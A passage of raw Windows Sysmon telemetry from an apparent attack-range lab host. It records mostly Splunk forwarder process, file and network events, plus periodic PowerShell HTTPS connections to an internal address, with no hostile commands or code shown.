Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.516{B81B27B7-A23C-6140-B456-04000000C801}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.131{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73B416ADFFD078F60D841325766FDD13,SHA256=09BD068B19571F7E7A54D9B66329036362A1D8CB57A1EF9E0B1E059A7133FE67,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:09.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B4B5C7FB19DCC2883F51411695868BE5,SHA256=59CCCDC250BF3FA759F91A1F080BB5873E7242F28C76632B3462F4F51DBB0CBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:09.146{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF7E3E7A36C7C65186FFEA6E8401E82F,SHA256=EAE3CDD5B730904EE8CDC3E93C422EDA9F906A3C7A8D6B01B9079A5EC97565AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:40.191{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50675-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:10.160{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A58EFC1796336A640B4A1FFA148BAABA,SHA256=E19A8A90766EEA2CECE183FBA6CAA289B8F9FF20ADB079801A1A4B242218DEB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:11.177{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA8046F6246835AD7A25144884C7F44D,SHA256=76CFC56E100AAF25D9679E6114441211A0F7B4ADBCF8FF8D9935B8CD5C95E2F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:12.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAFC530E0440BFCF2195EBD420C24011,SHA256=EF0886CE9FED4933D5DCC5C2C5E7717A7A4ECB62EF7C7A0EF5D2A98BE7CB8F1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:43.918{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50676-false10.0.1.12-8000- 23542300x800000000000000036498684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:13.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB63B5F3218D83712DB8D6D519245D4,SHA256=BC615D16C2F7432A24F81C48D883E0718C889DB43A09BC324BD37E36E4493BDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:14.542{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2274101050408370EB72985CE5B9412F,SHA256=39E97C4D9AF2BDBE3A4D29CB6B1DE4B6024A590DF1067AB20468BEC140D6FDB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:14.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA82EAE4C962F64CA91015D776B9CDC,SHA256=766DF5244ED77D3A2A94BE2B0E50C3A84BDA625F869BA15D84226E51F84D6905,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:45.202{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50677-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:15.241{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D693FE68ACA7DC23C9A2F3CBC0E3EFE,SHA256=5F4B11DF3ECC8BA4B886D7D10EB00473AAF97B26B756F81509EC5F5C6D078AD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:16.273{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAF0BBAB255DA24CE5AF65D0E1F9EE45,SHA256=967A7869E8D2C8766A58A141699057FF2DA4C4C34E5C5CEE98268BAFA2041058,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:17.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D8A4E5F6AEF9B0C1EA55C7AABC07A7,SHA256=2310CC56F26F81AC3DED86605AEF2C693A7F0CCCB61E79E13C464E42048FCE66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:18.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF551CEE3ED8BF09706DA5A0B97C4D2B,SHA256=5FF7AA360604ECE4C78C7EC40F5683A9991157498676E5F3C403C84E3108B58A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:49.902{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50678-false10.0.1.12-8000- 23542300x800000000000000036498693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:19.310{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2979910C0BFB2B0306DABC0681A5D5F,SHA256=62253002D893E3001A61CDF9B0E414E55A1903644BE8F92672E3D6EFC8197145,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:51.202{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50679-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:20.525{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E6394AA2F1828636C2B55A7DC28E7966,SHA256=B5B3C9F7BB736F3F0C59AB1CC15D6185FE40613E374244BA930DE50F2762BA05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:20.341{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCE83BC2DE2B4C45E62FAF3EEACA41D,SHA256=70435C05E0251AE0B1777BEFC3CFCFF1CC548E31D172B295CF70EA1E9E764852,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:21.355{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37B4C81CCB2693E33058022F1ABFA3F8,SHA256=3B1161EB42D3C9B34FC4ECF9D94187F38BB34D3BF7C596A226DF1CB351E576A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:22.373{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76B46E8EFFDB50B8DD80D8F764C81250,SHA256=631B66EF89A71F21EBF046D59D0E84B6EDC3D5E07402E0F8A250CF61D8D6391B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:23.393{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53CA0818415D68F34942561583B1EC8D,SHA256=5A3C121906A835C81B40A00867F87C30EDC34409BC4F037F4B34905F86C27C40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:23.271{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ED1E87FAF9D3F80DD1520DDB1FE64184,SHA256=C9A59D6558416A32C6E7DC926C7A4CFEFF01B8B43ADA78DB43DE30AD3B5FC3D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.976{B81B27B7-A24C-6140-B656-04000000C801}54004848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036498720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:55.216{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50680-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036498719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A24C-6140-B656-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A24C-6140-B656-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A24C-6140-B656-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.808{B81B27B7-A24C-6140-B656-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.555{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DFF31E315E0E3DB9276F7E6F6130E72D,SHA256=DAA19C7659EF47219C6A5926907AF1FBA5CDF26C179AF2565E1B997AA454398B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.423{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717750E5241B8D2B89BB21F1D98B2C9B,SHA256=AE26CEDBB0923ED87A57E0F362E6F244E588E1A29CBC4249B53B7D4BD4A9DAEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A24C-6140-B556-04000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 